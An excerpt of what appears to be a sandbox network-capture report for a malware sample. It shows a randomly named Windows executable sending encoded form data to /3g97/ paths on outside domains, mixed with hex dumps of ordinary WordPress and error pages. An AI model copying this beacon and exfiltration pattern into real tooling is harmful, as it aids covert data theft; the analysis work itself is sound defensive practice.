                                                                                              Data Ascii: 12l42=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
                                                                                              Apr 24, 2024 07:26:29.951217890 CEST1289INHTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:26:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Server: Apache
                                                                                              X-Powered-By: PHP/8.2.18
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                                              Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74
                                                                                              Data Ascii: 451<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="text
                                                                                              Apr 24, 2024 07:26:29.951241970 CEST179INData Raw: 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e
                                                                                              Data Ascii: /javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/co
                                                                                              Apr 24, 2024 07:26:29.951257944 CEST1289INData Raw: 31 30 37 31 0d 0a 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f
                                                                                              Data Ascii: 1071re\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/a-two-spa-salon.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.4.4"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={
                                                                                              Apr 24, 2024 07:26:29.951334953 CEST1289INData Raw: 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 3f 6e 65 77 20 4f 66 66 73 63 72 65 65 6e 43
                                                                                              Data Ascii: fined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(functi
                                                                                              Apr 24, 2024 07:26:29.951404095 CEST1289INData Raw: 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68
                                                                                              Data Ascii: tion(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everyt
                                                                                              Apr 24, 2024 07:26:29.951417923 CEST350INData Raw: 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a
                                                                                              Data Ascii: ssic-theme-styles-inline-css' type='text/css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2p
                                                                                              Apr 24, 2024 07:26:29.951467037 CEST1289INData Raw: 35 61 32 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f
                                                                                              Data Ascii: 5a2<style id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color-
                                                                                              Apr 24, 2024 07:26:29.951481104 CEST160INData Raw: 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33 38
                                                                                              Data Ascii: radient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradien
                                                                                              Apr 24, 2024 07:26:29.951539040 CEST1289INData Raw: 32 30 66 34 0d 0a 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35
                                                                                              Data Ascii: 20f4t--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--lu
                                                                                              Apr 24, 2024 07:26:29.951611042 CEST1289INData Raw: 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 63 72 69 73 70 3a 20 36 70 78 20 36
                                                                                              Data Ascii: gba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-star
                                                                                              Apr 24, 2024 07:26:30.218982935 CEST1289INData Raw: 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62
                                                                                              Data Ascii: ut-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--blac


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.449745157.7.107.63801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:26:32.277775049 CEST461OUTGET /3g97/?12l42=14Ldh71M1tAlq614+H+qL8FcHbYJSqGFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkSH7srevI7CXU30k1a21fOzbLf05e9HUvJZA=&AlB=sdJPX HTTP/1.1
                                                                                              Host: www.a-two-spa-salon.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:26:32.748277903 CEST506INHTTP/1.1 301 Moved Permanently
                                                                                              Date: Wed, 24 Apr 2024 05:26:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 0
                                                                                              Connection: close
                                                                                              Server: Apache
                                                                                              X-Powered-By: PHP/8.2.18
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              X-Redirect-By: WordPress
                                                                                              Location: http://a-two-spa-salon.com/3g97/?12l42=14Ldh71M1tAlq614+H+qL8FcHbYJSqGFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkSH7srevI7CXU30k1a21fOzbLf05e9HUvJZA=&AlB=sdJPX
                                                                                              X-Cache: MISS


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.449746172.217.16.36801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:26:46.608926058 CEST725OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.mz3fk6g3.sbs
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.mz3fk6g3.sbs
                                                                                              Referer: http://www.mz3fk6g3.sbs/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 55 42 79 6e 4b 73 52 6d 6c 68 30 72 59 4d 2f 52 6d 77 73 69 79 57 4e 7a 50 4b 4c 51 6a 66 59 43 55 6f 47 6a 5a 4e 65 35 63 49 5a 45 59 58 62 63 6e 4a 41 4b 59 66 68 33 61 57 70 78 49 2b 7a 32 66 6a 44 66 7a 68 42 36 6d 31 64 75 33 57 39 68 6c 4b 78 30 33 78 77 6c 61 73 4b 30 71 6a 4c 76 61 4d 30 31 4c 39 48 58 6b 55 59 6e 2b 51 79 6f 36 54 6b 77 6b 42 5a 4a 57 64 76 36 31 53 79 41 4b 5a 49 2b 35 4f 45 58 67 66 58 71 37 79 36 43 64 48 71 79 2f 39 36 34 52 74 4f 75 34 37 52 55 32 6a 30 38 77 50 63 46 64 77 37 45 4c 58 38 5a 4d 52 67 2f 76 78 59 72 58 65 4a 75 72 4c 37 5a 61 41 3d 3d
                                                                                              Data Ascii: 12l42=UBynKsRmlh0rYM/RmwsiyWNzPKLQjfYCUoGjZNe5cIZEYXbcnJAKYfh3aWpxI+z2fjDfzhB6m1du3W9hlKx03xwlasK0qjLvaM01L9HXkUYn+Qyo6TkwkBZJWdv61SyAKZI+5OEXgfXq7y6CdHqy/964RtOu47RU2j08wPcFdw7ELX8ZMRg/vxYrXeJurL7ZaA==
                                                                                              Apr 24, 2024 07:26:47.027081966 CEST1289INHTTP/1.1 404 Not Found
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Referrer-Policy: no-referrer
                                                                                              Content-Length: 1566
                                                                                              Date: Wed, 24 Apr 2024 05:26:46 GMT
                                                                                              Connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 